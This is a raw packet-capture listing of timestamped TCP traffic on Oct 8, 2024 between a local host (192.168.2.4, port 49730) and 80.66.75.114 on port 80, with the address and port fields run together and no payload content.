                                                            Oct 8, 2024 10:08:41.136518002 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:41.136534929 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:41.136547089 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:41.136568069 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:41.136585951 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:41.136600018 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:41.136615038 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:41.136634111 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:41.136650085 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:41.136667967 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:41.136682987 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:41.136703014 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:41.136718035 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:41.136751890 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:41.224378109 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:41.224587917 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:41.264668941 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:41.264714003 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:41.264751911 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:41.264780045 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:41.264780045 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:41.264810085 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:41.264843941 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:41.264858007 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:41.264858007 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:41.264878988 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:41.264890909 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:41.264913082 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:41.264946938 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:41.264949083 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:41.264967918 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:41.264981985 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:41.265008926 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:41.265018940 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:41.265043974 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:41.265072107 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:41.265075922 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:41.265105963 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:41.265130997 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:41.265160084 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:41.265160084 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:41.265196085 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:41.265217066 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:41.265228987 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:41.265254021 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:41.265281916 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:41.265286922 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:41.265317917 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:41.265337944 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:41.265353918 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:41.265377045 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:41.265393019 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:41.265415907 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:41.265428066 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:41.265450954 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:41.265460968 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:41.265470982 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:41.265496016 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:41.265510082 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:41.265531063 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:41.265549898 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:41.265590906 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:41.265718937 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:41.265770912 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:41.265794039 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:41.265806913 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:41.265814066 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:41.265856981 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:41.265856981 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:41.265892982 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:41.265909910 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:41.265927076 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:41.265949011 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:41.265961885 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:41.265971899 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:41.265995026 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:41.266010046 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:41.266032934 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:41.266051054 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:41.266082048 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:41.266849041 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:41.266889095 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:41.266901970 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:41.266941071 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:41.403497934 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:41.403568983 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:41.403587103 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:41.403604031 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:41.403621912 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:41.403637886 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:41.403660059 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:41.403676033 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:41.403693914 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:41.403708935 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:41.403748035 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:41.403765917 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:41.403798103 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:41.403815031 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:41.403832912 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:41.403855085 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:41.403872967 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:41.403893948 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:41.403997898 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:41.403997898 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:41.403997898 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:41.404357910 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:41.404391050 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:41.404416084 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:41.404426098 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:41.404438019 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:41.404459000 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:41.404479980 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:41.404494047 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:41.404515028 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:41.404526949 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:41.404545069 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:41.404561996 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:41.404573917 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:41.404597998 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:41.404612064 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:41.404649019 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:41.404711962 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:41.404742002 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:41.404763937 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:41.404788017 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:41.404795885 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:41.404830933 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:41.404845953 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:41.404881001 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:41.404882908 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:41.404917002 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:41.404932022 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:41.404951096 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:41.404963970 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:41.404984951 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:41.404994011 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:41.405036926 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:41.543847084 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:41.543895006 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:41.543951988 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:41.543948889 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:41.543948889 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:41.543988943 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:41.544012070 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:41.544027090 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:41.544039965 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:41.544061899 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:41.544078112 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:41.544095993 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:41.544116020 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:41.544130087 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:41.544147015 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:41.544163942 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:41.544178963 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:41.544198990 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:41.544212103 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:41.544231892 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:41.544248104 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:41.544265985 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:41.544275999 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:41.544300079 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:41.544316053 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:41.544337034 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:41.544347048 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:41.544365883 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:41.544385910 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:41.544399023 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:41.544403076 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:41.544433117 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:41.544449091 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:41.544466972 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:41.544481039 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:41.544501066 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:41.544513941 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:41.544534922 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:41.544547081 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:41.544579983 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:41.544626951 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:41.544676065 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:41.544681072 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:41.544713974 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:41.544728994 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:41.544763088 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:41.544765949 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:41.544800043 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:41.544814110 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:41.544835091 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:41.544848919 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:41.544869900 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:41.544884920 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:41.544919014 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:41.545301914 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:41.545335054 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:41.545353889 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:41.545368910 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:41.545377016 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:41.545418024 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:41.545419931 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:41.545454025 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:41.545466900 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:41.545488119 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:41.545501947 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:41.545521975 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:41.545531988 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:41.545553923 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:41.545568943 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:41.545680046 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:41.545690060 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:41.545725107 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:41.634927034 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:41.635328054 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:41.678551912 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:41.678574085 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:41.678582907 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:41.678591013 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:41.678600073 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:41.678606987 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:41.678622961 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:41.678632021 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:41.678958893 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:41.678970098 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:41.678994894 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:41.679013014 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:41.679028988 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:41.679045916 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:41.679047108 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:41.679060936 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:41.679078102 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:41.679078102 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:41.679078102 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:41.679094076 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:41.679100037 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:41.679110050 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:41.679122925 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:41.679128885 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:41.679142952 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:41.679161072 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:41.679179907 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:41.679186106 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:41.679202080 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:41.679217100 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:41.679260969 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:41.679260969 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:41.679260969 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:41.679335117 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:41.679352999 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:41.679368019 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:41.679425001 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:41.679425955 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:41.679425955 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:41.679559946 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:41.679575920 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:41.679609060 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:41.679625988 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:41.679691076 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:41.679706097 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:41.679721117 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:41.679738998 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:41.679753065 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:41.679747105 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:41.679747105 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:41.679747105 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:41.679747105 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:41.679748058 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:41.679748058 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:41.679857969 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:41.679857969 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:41.679858923 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:41.680114985 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:41.680130959 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:41.680145979 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:41.680165052 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:41.680201054 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:41.680201054 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:41.680496931 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:41.680511951 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:41.680545092 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:41.680545092 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:41.810707092 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:41.810730934 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:41.810755014 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:41.810770988 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:41.810786009 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:41.810802937 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:41.810817003 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:41.810837030 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:41.810837030 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:41.810933113 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:41.811290026 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:41.811316967 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:41.811332941 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:41.811341047 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:41.811347008 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:41.811361074 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:41.811362982 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:41.811376095 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:41.811378956 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:41.811397076 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:41.811408997 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:41.811435938 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:41.811435938 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:41.811455965 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:41.811522007 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:41.811537027 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:41.811575890 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:41.811575890 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:41.811584949 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:41.811599970 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:41.811615944 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:41.811630011 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:41.811630964 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:41.811646938 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:41.811650038 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:41.811672926 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:41.811672926 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:41.811691999 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:41.811871052 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:41.811896086 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:41.811903954 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:41.811940908 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:41.811971903 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:41.812005043 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:41.812021017 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:41.812036037 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:41.812052011 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:41.812052965 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:41.812079906 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:41.812079906 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:41.812110901 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:41.812119007 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:41.812149048 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:41.812165022 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:41.812165022 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:41.812201977 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:41.812201977 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:41.812324047 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:41.812366962 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:41.812385082 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:41.812400103 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:41.812438011 CEST4973080192.168.2.480.66.75.114
